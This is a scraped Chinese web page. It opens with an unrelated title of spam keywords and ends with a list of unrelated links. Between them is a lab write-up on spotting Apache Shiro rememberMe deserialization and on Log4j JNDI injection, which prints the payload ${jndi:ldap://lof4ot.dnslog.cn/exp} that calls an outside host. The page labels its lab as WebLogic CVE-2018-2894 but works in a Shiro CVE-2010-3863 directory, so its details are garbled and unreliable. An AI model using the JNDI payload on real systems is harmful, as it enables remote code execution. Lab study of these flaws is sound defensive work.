当前位置: 首页 > news >正文

可以直接进入的正能量网站老狼网站开发工程师面试问哪些问题

可以直接进入的正能量网站老狼,网站开发工程师面试问哪些问题,网页上传和网站开发,seo是啥职位文章目录 安装环境shiro漏洞验证log4j 安装环境 进入vulhb目录下的weblogic#xff0c;复现CVE-2018-2894漏洞#xff1a; cd /vulhub/shiro/CVE-2010-3863查看docker-compose的配置文件#xff1a; cat docker-compose.yml如图#xff0c;里面有一个镜像文件的信息和服… 文章目录 安装环境shiro漏洞验证log4j 安装环境 进入vulhb目录下的weblogic复现CVE-2018-2894漏洞 cd /vulhub/shiro/CVE-2010-3863查看docker-compose的配置文件 cat docker-compose.yml如图里面有一个镜像文件的信息和服务名以及它的端口号后面要用 然后使用下面命令搭建docker-compose并启动 sudo docker-compose up -d sudo docker-compose up -d如图安装成功 shiro漏洞验证 原理如下 Apache Shiro框架提供了记住我的功能RememberMe用户登陆成功后会生成经过加密并编码的cookie在服务端接收cookie值后Base64解码–AES解密–反序列化。攻击者只要找到AES加密的密钥就可以构造一个恶意对象对其进行序列化–AES加密–Base64编码然后将其作为cookie的rememberMe字段发送Shiro将rememberMe进行解密并且反序列化最终造成反序列化漏洞。 用bp自带的浏览器打开http://10.9.75.45:8080/随意输入用户名密码并勾选记住我 点击登录后抓包发送到repeat模块发现请求包中有rememberme字段 点击send发送响应包中有set-cookie字段并有rememberMedeleteMe内容这是一个shiro反序列化漏洞的强特征说明有极大的可能存在shiro反序列化 log4j log4jlog for Java是Apache的一个开源项目是一个基于Java的日志记录框架。该漏洞的主要原因是log4j在日志输出中未对字符合法性进行严格的限制执行了JNDI协议加载的远程恶意脚本从而造成RCE。 它是一个RCE命令执行的漏洞,它的日志的输出如下print函数双引号中的内容会被当做字符处理 $user$_GET(user); log.print(“用户$user登录失败”);如果print函数中出现如${jndi:ldap://lof4ot.dnslog.cn/exp}的内容就会将大括号中的内容当做命令执行 如果流量中遇到下面三个关键字极大可能是Java的漏洞攻击 rmi、jndi、ldap
http://www.hkea.cn/news/14487005/

相关文章:

  • 三门峡 网站开发昆明seo推广公司
  • 网站建设时程序的作用徐州网站建设价格
  • 广州档案馆建设网站亚马逊雨林简介
  • 做网站运营有趣吗黄冈网站开发
  • 超能力联盟网站网站后台登录密码修改
  • 饲料网站源码seo如何优化的
  • 郴州免费招聘网站海南最新消息新闻
  • 西安公司网站设计费用无需下载国外黄冈网站推广
  • 手机访问网站自动跳转好网
  • 上饶做网站建设永久免费虚拟主机申请
  • 网站域名收费标准可以看那种东西的手机浏览器
  • 潮安区住房和城乡建设局网站form e哪个网站做
  • 网站建设与维护一样吗电脑版百度
  • 程序员做彩票网站违法吗网络服务提供者知道网络用户利用其网络服务侵害他人
  • 河北网站制作公司地址app和网站的区别
  • 营销型网站盈利方案电商网站开发设计方案
  • 兔展在线制作网站网站外链有死链
  • wordpress子域名站点自我介绍网页模板代码
  • 做网站哪个公司比较好宜昌网站建设厂家
  • 科技网站 石家庄电商网站平台有哪些功能模块
  • 济南网站设计公司富做网站采集
  • 云指网站开发网站空间怎么使用
  • seo优化网站如何在网上卖货
  • 房产局网站建设方案网站模块建设中
  • 网站建设和客户对接内容建设企业网站首页
  • 网站推广的常用方法有哪些做外贸自己的公司网站
  • 长春建站方案网站优化seo推广服务
  • 重庆梁平网站建设费用seo网站营销推广
  • 专业网站建设教程百度推广免费建站
  • 驾校视频网站模板四网一体网站建设方案